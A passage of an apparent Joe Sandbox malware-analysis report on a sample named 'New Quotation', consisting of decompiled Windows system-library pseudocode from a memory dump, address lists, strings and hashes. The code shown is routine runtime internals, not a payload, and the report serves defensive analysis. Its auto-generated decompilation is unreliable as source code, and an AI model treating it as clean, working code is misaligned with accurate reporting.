							_t256 = ( ~_t144 & 0x0000003c) + 4;
							if(_t144 != 0) {
								_push(0);
								_push(0x1c);
								_push( &_v40);
								_push(3);
								_push(_t260);
								_push(0xffffffff);
								if(E1D812BE0() < 0 || (_v36 & 0x00000060) == 0 || _v40 != _t260) {
									E1D895FED(0, _t260, 1, _v36, 0, 0);
									_push("true");
									_pop(_t256);
								}
							}
							if(E1D898009( &_v108,  &_v92, 0, _v96, _t256,  *_t260, _t260[1]) >= 0) {
								__eflags = _v100;
								if(_v100 != 0) {
									__eflags = _a8 & 0x00000002;
									if((_a8 & 0x00000002) != 0) {
										E1D818F40(_v108, 0, _a4);
									}
								}
								 *((intOrPtr*)(_t194 + 0xc)) = _v108;
								_t150 = _v84 + _v84;
								_t211 = ( *(_t194 + 0x10) & 0x00000ffd | _v80 << 0x0000000c) & 0xfffffffd | _t150;
								 *(_t194 + 0x10) = _t211;
								asm("bsf eax, [esp+0x14]");
								 *(_t194 + 0x10) = (_t150 << 0x00000002 ^ _t211) & 0x000000fc ^ _t211;
								 *((short*)(_t194 + 0xc)) = (_v80 << 0xc) - _v72;
								_t87 =  &_a8;
								 *_t87 = _a8 & 0x00000001;
								__eflags =  *_t87;
								if( *_t87 == 0) {
									L1D7E2330( &(_t260[0x10]),  &(_t260[0x10]));
								}
								_t236 =  &(_t260[0x11]);
								__eflags =  *(_t236 + 4) & 0x00000001;
								_t212 =  *_t236;
								if(( *(_t236 + 4) & 0x00000001) != 0) {
									__eflags = _t212;
									if(_t212 == 0) {
										_t212 = 0;
										__eflags = 0;
									} else {
										_t212 = _t212 ^ _t236;
									}
								}
								_t258 =  *(_t236 + 4) & 1;
								_v92 = 0;
								__eflags = _t212;
								if(_t212 == 0) {
									L52:
									L1D7EEB80(_t236, _t212, _v92, _t194);
									__eflags = _a8;
									if(_a8 == 0) {
										E1D7E24D0( &(_t260[0x10]));
									}
									asm("cdq");
									asm("lock xadd [eax], ecx");
									asm("lock xadd [eax], ecx");
									_t245 = _v108;
									_t194 = 0;
									_v108 = _v108 & 0;
									_t162 = E1D7E3C40();
									__eflags = _t162;
									if(_t162 == 0) {
										_t163 = 0x7ffe0388;
									} else {
										_t163 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
									}
									__eflags =  *_t163 - _t194;
									if( *_t163 == _t194) {
										L65:
										return _t245;
									} else {
										E1D88DAAF(_t194, _t260, _t245, _v104);
										L61:
										__eflags = _t194;
										if(_t194 != 0) {
											E1D899629(_t194,  *_t260, _t260[1]);
										}
										goto L63;
									}
								} else {
									while(1) {
										__eflags = _v108 - ( *(_t212 + 0xc) & 0xffff0000);
										if(_v108 < ( *(_t212 + 0xc) & 0xffff0000)) {
											goto L46;
										}
										_t171 =  *(_t212 + 4);
										__eflags = _t258;
										if(_t258 == 0) {
											L44:
											__eflags = _t171;
											if(_t171 != 0) {
												L50:
												_t212 = _t171;
												continue;
											}
											L45:
											_v92 = 1;
											goto L52;
										}
										__eflags = _t171;
										if(_t171 == 0) {
											goto L45;
										}
										_t171 = _t171 ^ _t212;
										__eflags = _t171;
										goto L44;
										L46:
										_t171 =  *_t212;
										__eflags = _t258;
										if(_t258 == 0) {
											L49:
											__eflags = _t171;
											if(_t171 == 0) {
												L51:
												_v92 = 0;
												goto L52;
											}
											goto L50;
										}
										__eflags = _t171;
										if(_t171 == 0) {
											goto L51;
										}
										_t171 = _t171 ^ _t212;
										__eflags = _t171;
										goto L49;
									}
								}
							} else {
								if(_v100 == 0) {
									break;
								}
								_push(_t260[1]);
								_t248 = 0;
								_push( *_t260);
								_v100 = 0;
								_push(0x8000);
								E1D898845( &_v108,  &_v104);
								_v120 = _v120 & 0;
								_t229 = _a4;
								continue;
							}
						}
					}
					_t245 = _v80;
					goto L61;
				}
			}











































                                                                                                                                                                                          0x1d899ee0
                                                                                                                                                                                          0x1d899ee2
                                                                                                                                                                                          0x1d899ee6
                                                                                                                                                                                          0x1d899ee8
                                                                                                                                                                                          0x1d899eec
                                                                                                                                                                                          0x1d899ef0
                                                                                                                                                                                          0x1d899ef3
                                                                                                                                                                                          0x1d899ef5
                                                                                                                                                                                          0x1d899ef6
                                                                                                                                                                                          0x1d899ef8
                                                                                                                                                                                          0x1d899f00
                                                                                                                                                                                          0x1d899f04
                                                                                                                                                                                          0x1d89a2b2
                                                                                                                                                                                          0x1d89a2b2
                                                                                                                                                                                          0x1d89a2b7
                                                                                                                                                                                          0x1d89a2b9
                                                                                                                                                                                          0x1d89a2c0
                                                                                                                                                                                          0x1d89a2c6
                                                                                                                                                                                          0x1d89a2cb
                                                                                                                                                                                          0x1d89a2cb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d899f0a
                                                                                                                                                                                          0x1d899f0a
                                                                                                                                                                                          0x1d899f16
                                                                                                                                                                                          0x1d899f17
                                                                                                                                                                                          0x1d899f18
                                                                                                                                                                                          0x1d899f19
                                                                                                                                                                                          0x1d899f1a
                                                                                                                                                                                          0x1d899f1b
                                                                                                                                                                                          0x1d899f24
                                                                                                                                                                                          0x1d899f28
                                                                                                                                                                                          0x1d899f3a
                                                                                                                                                                                          0x1d899f3b
                                                                                                                                                                                          0x1d899f3b
                                                                                                                                                                                          0x1d899f3f
                                                                                                                                                                                          0x1d899f3f
                                                                                                                                                                                          0x1d899f41
                                                                                                                                                                                          0x1d899f47
                                                                                                                                                                                          0x1d899f6a
                                                                                                                                                                                          0x1d899f6c
                                                                                                                                                                                          0x1d899f76
                                                                                                                                                                                          0x1d899f7b
                                                                                                                                                                                          0x1d899f7f
                                                                                                                                                                                          0x1d899f7f
                                                                                                                                                                                          0x1d899f80
                                                                                                                                                                                          0x1d899f80
                                                                                                                                                                                          0x1d899f7b
                                                                                                                                                                                          0x1d899f84
                                                                                                                                                                                          0x1d899f8e
                                                                                                                                                                                          0x1d899f8e
                                                                                                                                                                                          0x1d899f49
                                                                                                                                                                                          0x1d899f4c
                                                                                                                                                                                          0x1d899f5e
                                                                                                                                                                                          0x1d899f5e
                                                                                                                                                                                          0x1d899f90
                                                                                                                                                                                          0x1d899f96
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d899f9f
                                                                                                                                                                                          0x1d899fa8
                                                                                                                                                                                          0x1d899fad
                                                                                                                                                                                          0x1d899fb2
                                                                                                                                                                                          0x1d899fb4
                                                                                                                                                                                          0x1d899fb6
                                                                                                                                                                                          0x1d899fbc
                                                                                                                                                                                          0x1d899fbd
                                                                                                                                                                                          0x1d899fbf
                                                                                                                                                                                          0x1d899fc0
                                                                                                                                                                                          0x1d899fc9
                                                                                                                                                                                          0x1d899fe6
                                                                                                                                                                                          0x1d899feb
                                                                                                                                                                                          0x1d899fed
                                                                                                                                                                                          0x1d899fed
                                                                                                                                                                                          0x1d899fc9
                                                                                                                                                                                          0x1d89a005
                                                                                                                                                                                          0x1d89a00a
                                                                                                                                                                                          0x1d89a00c
                                                                                                                                                                                          0x1d89a299
                                                                                                                                                                                          0x1d89a299
                                                                                                                                                                                          0x1d89a299
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a012
                                                                                                                                                                                          0x1d89a012
                                                                                                                                                                                          0x1d89a01d
                                                                                                                                                                                          0x1d89a024
                                                                                                                                                                                          0x1d89a02d
                                                                                                                                                                                          0x1d89a040
                                                                                                                                                                                          0x1d89a045
                                                                                                                                                                                          0x1d89a054
                                                                                                                                                                                          0x1d89a05f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a06a
                                                                                                                                                                                          0x1d89a072
                                                                                                                                                                                          0x1d89a094
                                                                                                                                                                                          0x1d89a098
                                                                                                                                                                                          0x1d89a09a
                                                                                                                                                                                          0x1d89a09a
                                                                                                                                                                                          0x1d89a074
                                                                                                                                                                                          0x1d89a074
                                                                                                                                                                                          0x1d89a07d
                                                                                                                                                                                          0x1d89a085
                                                                                                                                                                                          0x1d89a08e
                                                                                                                                                                                          0x1d89a08e
                                                                                                                                                                                          0x1d89a0a5
                                                                                                                                                                                          0x1d89a0ae
                                                                                                                                                                                          0x1d89a0b3
                                                                                                                                                                                          0x1d89a0b8
                                                                                                                                                                                          0x1d89a0ba
                                                                                                                                                                                          0x1d89a0bc
                                                                                                                                                                                          0x1d89a0c2
                                                                                                                                                                                          0x1d89a0c3
                                                                                                                                                                                          0x1d89a0c5
                                                                                                                                                                                          0x1d89a0c6
                                                                                                                                                                                          0x1d89a0cf
                                                                                                                                                                                          0x1d89a0ec
                                                                                                                                                                                          0x1d89a0f1
                                                                                                                                                                                          0x1d89a0f3
                                                                                                                                                                                          0x1d89a0f3
                                                                                                                                                                                          0x1d89a0cf
                                                                                                                                                                                          0x1d89a10f
                                                                                                                                                                                          0x1d89a145
                                                                                                                                                                                          0x1d89a14a
                                                                                                                                                                                          0x1d89a14c
                                                                                                                                                                                          0x1d89a150
                                                                                                                                                                                          0x1d89a15b
                                                                                                                                                                                          0x1d89a160
                                                                                                                                                                                          0x1d89a150
                                                                                                                                                                                          0x1d89a16a
                                                                                                                                                                                          0x1d89a180
                                                                                                                                                                                          0x1d89a185
                                                                                                                                                                                          0x1d89a187
                                                                                                                                                                                          0x1d89a18a
                                                                                                                                                                                          0x1d89a19b
                                                                                                                                                                                          0x1d89a1a9
                                                                                                                                                                                          0x1d89a1ad
                                                                                                                                                                                          0x1d89a1ad
                                                                                                                                                                                          0x1d89a1ad
                                                                                                                                                                                          0x1d89a1b1
                                                                                                                                                                                          0x1d89a1b7
                                                                                                                                                                                          0x1d89a1b7
                                                                                                                                                                                          0x1d89a1bc
                                                                                                                                                                                          0x1d89a1bf
                                                                                                                                                                                          0x1d89a1c3
                                                                                                                                                                                          0x1d89a1c5
                                                                                                                                                                                          0x1d89a1c7
                                                                                                                                                                                          0x1d89a1c9
                                                                                                                                                                                          0x1d89a1cf
                                                                                                                                                                                          0x1d89a1cf
                                                                                                                                                                                          0x1d89a1cb
                                                                                                                                                                                          0x1d89a1cb
                                                                                                                                                                                          0x1d89a1cb
                                                                                                                                                                                          0x1d89a1c9
                                                                                                                                                                                          0x1d89a1d5
                                                                                                                                                                                          0x1d89a1d8
                                                                                                                                                                                          0x1d89a1dd
                                                                                                                                                                                          0x1d89a1df
                                                                                                                                                                                          0x1d89a220
                                                                                                                                                                                          0x1d89a227
                                                                                                                                                                                          0x1d89a22c
                                                                                                                                                                                          0x1d89a230
                                                                                                                                                                                          0x1d89a236
                                                                                                                                                                                          0x1d89a236
                                                                                                                                                                                          0x1d89a23f
                                                                                                                                                                                          0x1d89a24f
                                                                                                                                                                                          0x1d89a25a
                                                                                                                                                                                          0x1d89a25e
                                                                                                                                                                                          0x1d89a262
                                                                                                                                                                                          0x1d89a264
                                                                                                                                                                                          0x1d89a268
                                                                                                                                                                                          0x1d89a26d
                                                                                                                                                                                          0x1d89a26f
                                                                                                                                                                                          0x1d89a281
                                                                                                                                                                                          0x1d89a271
                                                                                                                                                                                          0x1d89a27a
                                                                                                                                                                                          0x1d89a27a
                                                                                                                                                                                          0x1d89a286
                                                                                                                                                                                          0x1d89a288
                                                                                                                                                                                          0x1d89a2d0
                                                                                                                                                                                          0x1d89a2d8
                                                                                                                                                                                          0x1d89a28a
                                                                                                                                                                                          0x1d89a292
                                                                                                                                                                                          0x1d89a2a2
                                                                                                                                                                                          0x1d89a2a2
                                                                                                                                                                                          0x1d89a2a4
                                                                                                                                                                                          0x1d89a2ad
                                                                                                                                                                                          0x1d89a2ad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a2a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a1e1
                                                                                                                                                                                          0x1d89a1e9
                                                                                                                                                                                          0x1d89a1ed
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a1ef
                                                                                                                                                                                          0x1d89a1f2
                                                                                                                                                                                          0x1d89a1f4
                                                                                                                                                                                          0x1d89a1fc
                                                                                                                                                                                          0x1d89a1fc
                                                                                                                                                                                          0x1d89a1fe
                                                                                                                                                                                          0x1d89a217
                                                                                                                                                                                          0x1d89a217
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a217
                                                                                                                                                                                          0x1d89a200
                                                                                                                                                                                          0x1d89a200
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a200
                                                                                                                                                                                          0x1d89a1f6
                                                                                                                                                                                          0x1d89a1f8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a1fa
                                                                                                                                                                                          0x1d89a1fa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a207
                                                                                                                                                                                          0x1d89a207
                                                                                                                                                                                          0x1d89a209
                                                                                                                                                                                          0x1d89a20b
                                                                                                                                                                                          0x1d89a213
                                                                                                                                                                                          0x1d89a213
                                                                                                                                                                                          0x1d89a215
                                                                                                                                                                                          0x1d89a21b
                                                                                                                                                                                          0x1d89a21b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a21b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a215
                                                                                                                                                                                          0x1d89a20d
                                                                                                                                                                                          0x1d89a20f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a211
                                                                                                                                                                                          0x1d89a211
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a211
                                                                                                                                                                                          0x1d89a1e1
                                                                                                                                                                                          0x1d89a111
                                                                                                                                                                                          0x1d89a116
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a11c
                                                                                                                                                                                          0x1d89a11f
                                                                                                                                                                                          0x1d89a125
                                                                                                                                                                                          0x1d89a12b
                                                                                                                                                                                          0x1d89a12f
                                                                                                                                                                                          0x1d89a134
                                                                                                                                                                                          0x1d89a139
                                                                                                                                                                                          0x1d89a13d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a13d
                                                                                                                                                                                          0x1d89a10f
                                                                                                                                                                                          0x1d89a00c
                                                                                                                                                                                          0x1d89a29e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89a29e

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: `$`
                                                                                                                                                                                          • API String ID: 0-197956300
                                                                                                                                                                                          • Opcode ID: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                                                                                                                                          • Instruction ID: 09e245153a62decbd1bb6afbe5f72f6b0a57c8093af393fe02eb7c1d54509464
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                                                                                                                                          • Instruction Fuzzy Hash: 66C1BD312083469BEB19CF68C841B6BFBE5AFC4718F154A2DF5DA8B290D775E504CB42
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D802DBC Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E1D802DBC(void* __ecx, signed int __edx, signed short* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _t37;
				void* _t54;
				signed int* _t56;
				void* _t58;
				intOrPtr _t66;
				signed int _t69;
				void* _t70;
				signed int _t73;
				signed short* _t74;
				void* _t75;
				signed int* _t76;

				_t74 = _a4;
				_t54 = __ecx;
				_t37 = __edx;
				_t73 = 0;
				_v12 = __edx;
				if(__ecx == 0 || __edx < 1 || __edx >  *((intOrPtr*)(__ecx + 4))) {
					_t56 = _a8;
					goto L17;
				} else {
					if(_t74 == 0) {
						_t56 = _a8;
						L20:
						_v8 = _v8 & _t73;
						L21:
						if(_t74 == 0) {
							_v12 = _v12 & _t73;
						} else {
							_v12 =  *_t74 & 0x0000ffff;
						}
						if(_t54 == 0) {
							_t66 = 0;
						} else {
							_t66 =  *((intOrPtr*)(_t54 + 4));
						}
						_push(_t56);
						_push(_v8);
						_push(_v12);
						_push(_t74);
						_push(_t66);
						_push(_t37);
						_push(_t54);
						E1D85EF10(0x33, 0, "SXS: %s() bad parameters\nSXS:  Map                    : %p\nSXS:  AssemblyRosterIndex    : 0x%lx\nSXS:  Map->AssemblyCount     : 0x%lx\nSXS:  StorageLocation        : %p\nSXS:  StorageLocation->Length: 0x%x\nSXS:  StorageLocation->Buffer: %p\nSXS:  OpenDirectoryHandle    : %p\n", "RtlpInsertAssemblyStorageMapEntry");
						_t75 = 0xc000000d;
						L12:
						if(_t73 != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t73);
						}
						L13:
						return _t75;
					}
					_t69 =  *_t74 & 0x0000ffff;
					_t58 = 2;
					_t56 = _a8;
					if(_t69 < _t58 || _t74[2] == 0 || _t56 == 0) {
						L17:
						if(_t74 == 0) {
							goto L20;
						}
						_v8 = _t74[2];
						goto L21;
					} else {
						_t59 = _t69;
						if(_t69 + 2 > 0xfffe) {
							_t75 = 0xc0000106;
							goto L13;
						}
						_t73 = E1D7E5D90(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t59 + 0x12);
						if(_t73 == 0) {
							_t75 = 0xc0000017;
							goto L13;
						}
						 *_t73 =  *_t73 & 0x00000000;
						_t9 = _t73 + 0x10; // 0x10
						 *(_t73 + 4) =  *_t74;
						 *((intOrPtr*)(_t73 + 8)) = _t9;
						_t70 = 2;
						 *((short*)(_t73 + 6)) =  *_t74 + _t70;
						E1D8188C0(_t9, _t74[2],  *_t74 & 0x0000ffff);
						_t76 = _a8;
						 *((short*)( *((intOrPtr*)(_t73 + 8)) + (( *(_t73 + 4) & 0x0000ffff) >> 1) * 2)) = 0;
						 *(_t73 + 0xc) =  *_t76;
						asm("lock cmpxchg [edx], ecx");
						if(0 == 0) {
							_t73 = 0;
							 *_t76 =  *_t76 & 0;
						}
						_t75 = 0;
						goto L12;
					}
				}
			}
















                                                                                                                                                                                          0x1d802dc6
                                                                                                                                                                                          0x1d802dc9
                                                                                                                                                                                          0x1d802dcc
                                                                                                                                                                                          0x1d802dce
                                                                                                                                                                                          0x1d802dd0
                                                                                                                                                                                          0x1d802dd5
                                                                                                                                                                                          0x1d8425d7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802ded
                                                                                                                                                                                          0x1d802def
                                                                                                                                                                                          0x1d8425e6
                                                                                                                                                                                          0x1d8425e9
                                                                                                                                                                                          0x1d8425e9
                                                                                                                                                                                          0x1d8425ec
                                                                                                                                                                                          0x1d8425ee
                                                                                                                                                                                          0x1d8425f8
                                                                                                                                                                                          0x1d8425f0
                                                                                                                                                                                          0x1d8425f3
                                                                                                                                                                                          0x1d8425f3
                                                                                                                                                                                          0x1d8425fd
                                                                                                                                                                                          0x1d842604
                                                                                                                                                                                          0x1d8425ff
                                                                                                                                                                                          0x1d8425ff
                                                                                                                                                                                          0x1d8425ff
                                                                                                                                                                                          0x1d842606
                                                                                                                                                                                          0x1d842607
                                                                                                                                                                                          0x1d84260a
                                                                                                                                                                                          0x1d84260d
                                                                                                                                                                                          0x1d84260e
                                                                                                                                                                                          0x1d84260f
                                                                                                                                                                                          0x1d842610
                                                                                                                                                                                          0x1d84261f
                                                                                                                                                                                          0x1d842627
                                                                                                                                                                                          0x1d802ea0
                                                                                                                                                                                          0x1d802ea2
                                                                                                                                                                                          0x1d84263e
                                                                                                                                                                                          0x1d84263e
                                                                                                                                                                                          0x1d802ea9
                                                                                                                                                                                          0x1d802eae
                                                                                                                                                                                          0x1d802eae
                                                                                                                                                                                          0x1d802df5
                                                                                                                                                                                          0x1d802dfa
                                                                                                                                                                                          0x1d802dfe
                                                                                                                                                                                          0x1d802e01
                                                                                                                                                                                          0x1d8425da
                                                                                                                                                                                          0x1d8425dc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8425e1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802e18
                                                                                                                                                                                          0x1d802e18
                                                                                                                                                                                          0x1d802e22
                                                                                                                                                                                          0x1d8425cd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8425cd
                                                                                                                                                                                          0x1d802e3b
                                                                                                                                                                                          0x1d802e3f
                                                                                                                                                                                          0x1d802eb1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802eb1
                                                                                                                                                                                          0x1d802e41
                                                                                                                                                                                          0x1d802e44
                                                                                                                                                                                          0x1d802e4a
                                                                                                                                                                                          0x1d802e50
                                                                                                                                                                                          0x1d802e56
                                                                                                                                                                                          0x1d802e5a
                                                                                                                                                                                          0x1d802e66
                                                                                                                                                                                          0x1d802e77
                                                                                                                                                                                          0x1d802e7c
                                                                                                                                                                                          0x1d802e85
                                                                                                                                                                                          0x1d802e92
                                                                                                                                                                                          0x1d802e98
                                                                                                                                                                                          0x1d802e9a
                                                                                                                                                                                          0x1d802e9c
                                                                                                                                                                                          0x1d802e9c
                                                                                                                                                                                          0x1d802e9e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802e9e
                                                                                                                                                                                          0x1d802e01

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 1D842616
                                                                                                                                                                                          • RtlpInsertAssemblyStorageMapEntry, xrefs: 1D842611
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                                                                                                                          • API String ID: 0-2104531740
                                                                                                                                                                                          • Opcode ID: 4d80332a6c1e8248043c27a2d933816ce6d458551b482380af82e1b76c89f3a7
                                                                                                                                                                                          • Instruction ID: e4770ac4617e724dd3d78bbc27ea70d600f30326060d1c11bbdd900dc522f175
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d80332a6c1e8248043c27a2d933816ce6d458551b482380af82e1b76c89f3a7
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB41E276604219EBD715CF45C890B7AB3B5FF94B24F22C16DE9449B240E770E841CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D810F16 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E1D810F16(void* __ecx, intOrPtr* _a4) {
				signed int _v12;
				char _v16;
				char _v24;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _t52;
				void* _t53;
				void* _t54;

				_t49 = __ecx;
				_v12 = _v12 | 0xffffffff;
				_t52 = 0;
				_t48 = E1D7E5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x1000);
				if(_t25 == 0) {
					return 0xc0000017;
				}
				E1D815050(_t49,  &_v24, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control");
				_v56 = 0x18;
				_v48 =  &_v24;
				_push( &_v56);
				_push(0x20019);
				_v52 = 0;
				_push( &_v12);
				_v44 = 0x40;
				_v40 = 0;
				_v36 = 0;
				_t54 = E1D812AB0();
				if(_t54 >= 0) {
					_t53 = E1D7E5D90(_t49,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x10);
					if(_t53 == 0) {
						_t54 = 0xc0000017;
						_t52 = 0;
					} else {
						E1D811291(_t48);
						E1D815050(_t48,  &_v32, _t48);
						_push( &_v16);
						_push(0x10);
						_push(_t53);
						_push(2);
						_push( &_v32);
						_push(_v12);
						_t54 = E1D812B00();
						if(_t54 >= 0) {
							 *_a4 =  *((intOrPtr*)(_t53 + 0xc));
						}
						_t52 = 0;
						E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
					}
					_push(_v12);
					E1D812A80();
				}
				E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t48);
				return _t54;
			}
















                                                                                                                                                                                          0x1d810f16
                                                                                                                                                                                          0x1d810f24
                                                                                                                                                                                          0x1d810f30
                                                                                                                                                                                          0x1d810f3b
                                                                                                                                                                                          0x1d810f3f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84998c
                                                                                                                                                                                          0x1d810f4e
                                                                                                                                                                                          0x1d810f56
                                                                                                                                                                                          0x1d810f5d
                                                                                                                                                                                          0x1d810f63
                                                                                                                                                                                          0x1d810f64
                                                                                                                                                                                          0x1d810f6c
                                                                                                                                                                                          0x1d810f6f
                                                                                                                                                                                          0x1d810f70
                                                                                                                                                                                          0x1d810f77
                                                                                                                                                                                          0x1d810f7a
                                                                                                                                                                                          0x1d810f82
                                                                                                                                                                                          0x1d810f86
                                                                                                                                                                                          0x1d810f99
                                                                                                                                                                                          0x1d810f9d
                                                                                                                                                                                          0x1d811005
                                                                                                                                                                                          0x1d81100a
                                                                                                                                                                                          0x1d810f9f
                                                                                                                                                                                          0x1d810fa4
                                                                                                                                                                                          0x1d810fae
                                                                                                                                                                                          0x1d810fb6
                                                                                                                                                                                          0x1d810fb7
                                                                                                                                                                                          0x1d810fb9
                                                                                                                                                                                          0x1d810fba
                                                                                                                                                                                          0x1d810fbf
                                                                                                                                                                                          0x1d810fc0
                                                                                                                                                                                          0x1d810fc8
                                                                                                                                                                                          0x1d810fcc
                                                                                                                                                                                          0x1d84999c
                                                                                                                                                                                          0x1d84999c
                                                                                                                                                                                          0x1d810fd9
                                                                                                                                                                                          0x1d810fdf
                                                                                                                                                                                          0x1d810fdf
                                                                                                                                                                                          0x1d810fe4
                                                                                                                                                                                          0x1d810fe7
                                                                                                                                                                                          0x1d810fe7
                                                                                                                                                                                          0x1d810ff7
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • @, xrefs: 1D810F70
                                                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 1D810F45
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                                                                                                                                          • API String ID: 0-2976085014
                                                                                                                                                                                          • Opcode ID: 0bc081225f12bb3902ffed29813d79d9d7e10f296fcec61e62b87eaa88a896eb
                                                                                                                                                                                          • Instruction ID: f500dff50a8a3e6a7a86b41e8d3f2009c5785d1b063fe9e398b6452db7414493
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bc081225f12bb3902ffed29813d79d9d7e10f296fcec61e62b87eaa88a896eb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8631937290014DAFCB12DB99CC85F9F7BB8EB84B50F020125F600AB260DB34ED05C7A1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D879C98 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 74%
